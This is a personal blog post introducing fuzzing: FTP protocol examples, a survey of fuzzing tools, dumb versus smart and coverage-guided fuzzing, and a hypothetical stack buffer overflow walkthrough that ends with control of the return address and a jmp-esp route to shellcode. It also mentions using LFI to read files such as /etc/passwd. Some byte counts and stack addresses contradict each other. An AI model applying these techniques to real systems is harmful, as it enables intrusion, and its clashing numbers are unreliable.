05 - How to maybe not be so bad at fuzzing, Part 1

05 - Back to the Fuzzing


Alright, in previous posts I've utilized fuzzing to 'locate' crashes in applications, but definitely ran into a lot of problems whilst doing it.  As I've alluded to, this blog is more about the learning experience than it is about showing folks exactly how to do things, primarily because I'm a pretty big n00b at a lot of this stuff, anyway.  Alas, I'm learning and improving daily.

Part one of the fuzzing post will cover more informational aspects of fuzzing, such as what fuzzing is, how it is used, and some of the available tools and a short example on the basic buffer overflow, as well as its relation to fuzzing.

In part two, I'll go into greater detail with some of the currently available network fuzzers, and how to use them.

01 - What is fuzzing?

The term gets thrown around a lot.  It's not complicated, but perhaps I should start here. Fuzzing is the practice of sending (via whatever medium) an application 'junk' data.  Usually, in the effort of locating crashes, vulnerabilities and/or unintended / unexpected behavior-- mainly, just to see what happens.

Fuzzing can be used in many situations, from network based or file based, to fuzzing specific API calls in operating systems.  In situations such as network fuzzing, we're typically attempting to send junk data over the wire to see how the application responds-- from the exploit development standpoint, we want to trigger a crash.  This doesn't necessarily need to be crafted packets sent over FTP, but fuzzing also applies to simple things such as an HTTP GET request.  Folks can argue this however they like, but the core concepts are applicable.

Let's say you've located an LFI vulnerability.  You've done some enumeration, and you probably want to expedite the process of locating sensitive files.  Trying lots of files by hand, unless you know exactly what to pull (/etc/passwd, for instance) really sucks and it takes time.  This is, although rudimentary, a great use case for fuzzing.  Forced browsing itself is a form of fuzzing.  Tools like dirb, dirbuster, Burp's content discovery, gobuster, etc, are all a form of fuzzing, though not what people typically think of when the term is used.

Let's think about another application of fuzzing: network based.  Normally you'll be looking at applications from the client / server model.  To be clear, fuzzing HTTP is also network based fuzzing, as its protocol operates over a, duh, network, but we won't deal so much with semantics in these cases.  Let's look at how an FTP client / server model works.

If we boot up wireshark or watch packets another way, we see the first part of a typical TCP connection, the three-way handshake.  Once our 3WHS has been instantiated, we effectively have a session on the FTP server.  Generally, the FTP server will initially respond with something akin to a banner and will await data from the client.  Depending on the server's configuration, it expects specific kinds of commands to be sent to it.  If we wanted to send a file on the FTP server, we'd use the PUT command.

The server sees a well-formed packet from our FTP client that says "PUT <this-file> on the server".  As long as all criteria are met, such as the file existing on the client, the PUT command is enabled, the packet follows the RFC, and the proper permissions exist on the server, the server should oblige.  Some data (including the file) will be sent over the wire and reconstructed as a new file on the server.

So, yeah, pretty normal; but why does fuzzing relate to this?  Well, a couple important things were mentioned above.  At the most basic level, we can look at it from the 'criteria' standpoint for two specific details:
  • The server expects specific commands
  • A 'well-formed' packet is sent
First off, ask yourself this: "What happens if I send an invalid command to an FTP server?"

Well, in most cases the FTP server will just nope you right out.  It doesn't care, it expects an apple and you gave it a rock.  It doesn't know what to do with a rock, and frankly it couldn't care less.  It know this isn't an apple, and it ignores it.

Right?

Secondly, what happens when a malformed packet is sent?  Well, you'd hope for the same, of course. The server should see the packet, see that it isn't of the proper format and again, ignore it.

Right?

In the case of FTP, where it's a long known, accepted and standardized protocol, we have RFC's to define proper packet... etiquette, you could say.  RFC's are essentially just a way to standardize protocols so we as humans can agree upon some sort of 'right' way to use them.  Computers don't think for themselves (most? currently?), so as with any program / programming language, we need a way to define the proper way to talk to them.  It's similar to language constructs.

We mostly agree on how english is spoken for example, so if I were to start a sentence off with 'Goodbye, how time be me after?' you probably wouldn't really understand what I was trying to say.  Computers and humans alike can still attempt to process that information, but only one of them can really parse it properly.  It still won't really make sense, as it's malformed english, but we as humans can apply abstract thought to it and start to try to 'fix' what happened.

Computers don't have that option, unless we give it to them via programmatic means.  AI is obviously a different story, but even in that case, we need to teach an AI machine the necessary skills to not just 'ignore' the malformed information and have some way of dealing with it.  A typical FTP server will not have any idea what to do with malformed packets, and should just ignore them.

That should is where things get fun for us though.

Obviously, there are a lot of intricacies, complexities and caveats to the above analogies-- take it all with a grain of salt, but the concepts are valid.

02 - Tools


With the plethora of fuzzing platforms that exist, it can be hard to find one that you:
  • Enjoy using
  • Don't get fed up with half-way through set up
I primarily use boofuzz and SPIKE as I'm normally only fuzzing network applications.

Truth be told, I have an affinity towards boofuzz primarily because it's written in python, a language I'm 'familiar' with, but also for its documentation.  That seems a bit silly-- you'd think most tools have some sort of documentation, though often times I find myself revisiting powerpoint presentations to find something useful out about SPIKE or Sulley, etc.

Admittedly, boofuzz's documentation, while thorough, still leaves a cryptic feel in my mind when I review it.  The lack of examples can make things a little confusing at times as far as how I think something is supposed to be used versus how the creator intended it.  I frequently find myself trying to implement a feature, only to find I'm using it outrageously wrong.

That's fine and all, really, part of the fun for me is figuring out the best use case for tools and how to apply them to solve a problem.

boofuzz is attractive to me for a few reasons:
  • Ease of use / implementation
  • Python (woo)
  • PEDRPC / ProcMon
  • Extensible
  • Fairly fast
  • Lots of test cases
  • Highly customizable
Most are pretty straightforward.  Later on we'll look at some use case examples of what boofuzz has to offer, and where it may not be necessary to use.

Some tools made specifically for fuzzing:

  • SPIKE
    • No longer in development, still a great tool
  • Sulley
    • SPIKE's successor, no longer in development
  • boofuzz
    • Sulley's successor, actively developed
  • radamsa
    • Generate 'randomized' data for use in fuzzing
  • AFL (American Fuzzy Lop)
    • Coverage-guided fuzzer
  • LibFuzzer
    • Coverage-guided fuzzer
  • and many, many more...

Overall, there are a ridiculous amount of tools that have been created with fuzzing specifically in mind, as well as tons of tools out there that can be leveraged to fuzz with.  As expected, it's fairly easy to make a rudimentary fuzzer by just writing a script to throw lots of data at an application as well.  With the plethora of available tools, it can be hard choosing between them.  Really, the best bet is to break down the objective and not overthink the 'problem'.  Generally it's good to ask yourself what you're trying to accomplish.  

If you're planting a garden, there's no reason to use a backhoe when a small shovel will do.  Sure, both might work, but there's not a compelling argument to be made for the former besides that it will work.  It's just unnecessary.

The same can be said for fuzzing.  If you're just sending ever growing strings at a server, you may find it easier to just write a while loop in python with sockets.  If however, you're trying to see what data the server likes or dislikes, it's probably going to be easier to use a fuzzer like SPIKE, instead.

Breaking the problem down is your best bet when choosing a plan.  I frequently find myself writing HTTP requests out in python and using sockets prior to remembering that the 'requests' library exists, for instance.  To understand what the best tool for the job is, it's important to understand the different types of fuzzing that exist.

03 - Types of Fuzzing

Alright, so I'm absolutely not going to cover "every type of fuzzing ever", as I probably haven't even heard of them.

Coverage-Guided Fuzzing

I noted this above when referring to AFL and LibFuzzer.  Personally, I don't have any experience with this type of fuzzing beyond familiarity with the concept.

'Coverage-Guided', or just 'Guided', is a type of fuzzing intended to 'cover' an application or library's code surface.  With guided fuzzing, a library (i.e. a DLL) will be tested via a function / API call.  The guided fuzzer will send some data, referred to as a corpus, to the target and map out the path the code follows.  The fuzzer will then make modifications to the corpus and send it again.  This hopefully results in more and more 'code coverage'.  Guided fuzzers can be thought of as creating a flowchart of application logic when presented with certain values.  If you've ever looked at IDA Pro or graphed a function using Olly or Immunity, the guided fuzzer will create a 'similar' model of the target.

Guided fuzzing is extremely useful as it enables testers and developers alike to create a map of a function to track down bugs, find anomalous behavior, or just make sure things are working as intended.  There are many scholarly articles published relevant to guided fuzzing, and a lot of tools out there to do it.  Really, the best way to learn about this type of fuzzing is to try it.


Dumb / Smart Fuzzing

Strictly speaking, these two names, 'Dumb' and 'Smart' fuzzers are misnomers.  There isn't necessarily a dumb fuzzer, nor a smart fuzzer at that, but the two names separate behaviors of fuzzing.  Smart fuzzing specifically, describes a fuzzer that may 'learn' from results or modify its corpus in a more... directed fashion.  An example of smart fuzzing would be the guided fuzzing that was discussed above.  These are considered 'smart' fuzzers because they are built to make decisions, or analyze results and apply applicable test cases in a fashion that makes them seem smart.  Smart fuzzers may be syntactically aware, or even have the ability to recognize what type of input should be sent by learning from observation, responses, or even the library itself.

People often consider fuzzers that are 'aware' of input (and adjust accordingly) smart.  This is in direct contrast to a fuzzer which might not necessarily be 'aware' of the application's or library's expected input, but attempts to throw everything but the kitchen sink at it.  Fuzzers that aren't built with the ability to make decisions, but rather send arbitrary, or even directed, data at an application would be considered 'dumb'.  A dumb fuzzer may have a set list of corpora that will be sent.  This list is likely iterated through until the end, or until the application stops receiving for whatever reason.

Many fuzzers are extensible, especially those you write yourself.  You may find it necessary to fuzz a server attached in a more automated fashion, rather than manually inspecting any crashes that may be generated.  In cases like these, it's possible to utilize debugger APIs to attach to applications, dump relevant crash data, restart the process, reattach, and continue fuzzing.  This is a way to add some utility to a fuzzer, dumb or smart.

The prefix 'dumb' definitely applies a negative stigma to the tool.  That's unfortunate, as a dumb fuzzer is just as capable as a smart fuzzer in its expected applications.  Like alluded to earlier, choose the right tool for the job.

04 - A, AA, AAA, AAAA, AAAAAAAAAAAAAAAAAAAAAAAAAA...

If you've fuzzed applications in the past, the above probably looks familiar for more reasons than just the being first letter of the english alphabet, repeated a bunch.  For those of you who may be unfamiliar with the process, the above is a pretty boring, although effective, style of fuzzing: sending larger and larger payloads of 'junk' data at an application.

Why is this important?  Well, think of it like this:
  • An application expects data to be sent and it will store it in a buffer
    • The buffer space allotted by the developer is 96 bytes
  • We send ever increasing amounts of 'A's at the server.  
  • The server stores each payload in its available buffer
  • Once we reach 104 'A's, what happens?
If the application has any built-in error handling, or the buffer is truncated to the available size and superfluous data dropped, everything might be fine.  However, even with built-in error handling, depending on its implementation, everything might not be fine.

This is the quintessential buffer overflow.  To help those to whom this may be a new concept, let's look at it visually.

We'll make a few assumptions of a hypothetical program:
  1. The application expects a maximum of 96 bytes to be sent 
  2. The application does not check the size of the data that is sent
  3. The application has no protections in place, such as stack cookies, DEP, etc
In later posts, I'll discuss stack cookies (the /GS flag), DEP, and other protections.

There are some initial instructions which almost all functions start with, referred to as the function prologue.  First, the EBP register, which is used to mark frame pointers, is pushed onto the stack, saving the previous frame's location.  The next instruction updates EBP with the value of ESP (the current stack frame), so we can 'trace' back the application's flow by following the EBP register if we wanted.  Then, ESP is subtracted by XX bytes, to make room for local variables.  In our program, it could look like the following:

push ebp      ; Save the location of the previous stack frame
mov ebp,esp   ; Place ESP into EBP, updating the value with the current stack frame
sub esp,64    ; subtract 100 bytes from ESP (makes room for local variables, our buffer)

At this point, our stack looks like the following:
00402000    00000000 ; 100 bytes lower, ESP now points here after the sub
00400204    00000000
00402008    00000000
...
00402064    00401111 ; saved EBP-- top of the current stack frame
00402068    00401000 ; return address, saved via call to function
...
00402FFF    00000000 ; Top of stack

The next instructions in our program are responsible for looping through the buffer and placing the values onto the stack.  Since ESP now points 100 bytes down the stack, at 00402000, as the buffer is added to the stack, our application will add four bytes to ESP after each move instruction until the buffer has been read.

If the application does not check how much data we sent, and the looping function continues to write to the stack until the buffer is exhausted, there might be a problem.  Let's assume we send a 104 byte buffer of A's to the application.  That should likely cause some problems, but two questions remain: why 104 bytes and what happens?

Since we know the saved return address was placed onto the stack at location 00402068, then EBP was pushed to the stack, at a buffer length of 104 bytes we will overwrite the saved return address.

Let's look at how this plays out:
       __________________ ____________  ___________
      |    96 Byte Buffer   || Saved EBP  ||  Ret Addr |
      |__________________||____________||__________|

       AAAAAAAAAAAA........AAAA..........AAAA
              (96 bytes)            (4 bytes)       (4 bytes)         =    104 bytes

Looking at the stack, it's pretty obvious:
00402000    41414141    
00400204    41414141
00402008    41414141
...                     ; 96 bytes of A
00402064    41414141    ; Saved EBP overwritten
00402068    41414141    ; Saved return, Overwritten!
...
00402FFF    00000000    ; Top of stack

Once our function completes, a return instruction occurs.  This is the 'what happens' part.  When a return, ret (0xC3) occurs, the application leaves the current function and returns to the location of ESP.  Since the function prologue saved the calling function by initially placing EBP onto the stack, and our write buffer loop stopped at our 100 byte buffer (overwriting the saved address), the function is going to attempt to return to '41414141', the current value in ESP.

This isn't necessarily conducive to exploiting the application, however.  Although we control EIP, by the return address jumping to user controlled code, the only way to exploit the application at its current state is to find a location in memory that jumps or calls ESP-64 (or some equivalent instruction), placing us at the start of our buffer.  Still, that would only leave us with 96 bytes to write shellcode.  Enough for calc, or something akin to it, but typical reverse and bind shells take at least 250-300.

What can we do about that?  Well, remember the loop function we (made up) talked about earlier?That just keeps on writing until either the end of the stack is hit (and nothing can be written, application dies or invokes SEH) or until no more buffer remains.  Looking at the top of the stack, 00402FFFF, there is plenty of space to write more data.

At this point, we send as much data as we needed for shellcode, then jump into the buffer space after the saved return address.  We might be able to find a location in memory that does a 'jmp esp+4' if ESP points to our return address.  If ESP still points to the beginning of where our buffer started being written, we could replace the return address that we overwrote with a 'jmp ESP', replace the initial bytes of our buffer with a instructions to jump to our shellcode.

05 - Takeaways


There are many potential ways to exploit the above hypothetical application, but they all started with fuzzing.  Sending more and more bytes to the application caused a crash at 100 A's.  That doesn't mean we can't experiment after initial fuzzing to see if sending more bytes is possible, though!  In this case, the first crash is only indicative of an issue in how the data is being processed, and further investigation is required.

  • Remember that fuzzing is not the end all, be all of locating crashes.
  • It's still necessary to take the time to analyze crashes you might locate to see if they might be exploitable.
  • Many, many awesome bugs have been uncovered by fuzzing, but fuzzers don't know how to exploit a crash-- they can just make it visible.
  • Not all crashes will be exploitable!  If you've read my previous posts about fuzzing, you'll see that I struggled with a particular crash's available buffer space.  Don't be afraid to jot down crash info and move on.
  • You will learn more by doing, as understanding the concepts is only part of the task.


In the next post, I'll spend some time showing some examples of fuzzing templates, writing some in python socket loops, using SPIKE, and utilizing boofuzz to fuzz for us.


Comments

Popular posts from this blog

06 - How to maybe not be so bad at fuzzing, Part 2

07 - Just Another OSCE Review